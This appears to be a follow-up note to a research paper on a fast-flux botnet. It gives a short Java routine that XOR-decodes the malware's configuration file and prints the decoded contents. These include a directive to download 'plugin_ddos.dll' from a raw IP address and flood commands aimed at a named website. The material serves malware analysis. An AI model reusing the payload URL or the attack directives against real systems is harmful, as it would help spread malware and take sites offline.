Several of our readers kindly reversed the encrptyed configuration
file in Appendix D of the paper and provided an explanation.  
Knowing the contents of the configurationfile changes our 5th point 
of the "Fast-Flux Case Study" considerably. Yes, it does download 
"plugin_ddos.dll", but only because it's ordered to. Depending on the 
configuration file (which is reloaded hourly as you state), the 
malware can change skin and become anything the owner wants.  We 
would like to thank Ronny Tomaat and Jan Alsenz for hard work in
decoding and analyzing the encrypted configuration file.  All the 
line contents are xor'ed with the fixed constant 0xE9.  The 
following short java snippet decodes the file: 

public class Flux_Decode {

       public static void main(String[] args) throws IOException {
               BufferedReader in = new BufferedReader(new InputStreamReader(new
                FileInputStream("g:\\fluxnet_setting.ini"), "ISO-8859-1")); 
               int key = Integer.decode("#E9");
               while (true) {
                       String inStr = in.readLine();
                       if (inStr == null) {
                               break; 
                       }
                       char[] inp = inStr.toCharArray();
                       for (int i = 0; i < inp.length; i++) {
                               inp[i] = (char)(inp[i] ^ key); 
                       }
                       System.out.println(new String(inp));
               }

               in.close();
       }

 }

Just replace the path, or make it a parameter.  The decoded 
content is:

==[start decryption]==
[]

ddos|dl|http://65.111.176.174/weby/plugin_ddos.dll

ddos|tcp|americandvd.tv|80|10000
ddos|udp|americandvd.tv|80|10000
ddos|troll|americandvd.tv|80|10000 
ddos|http|americandvd.tv|80|10000

==[end decryption]==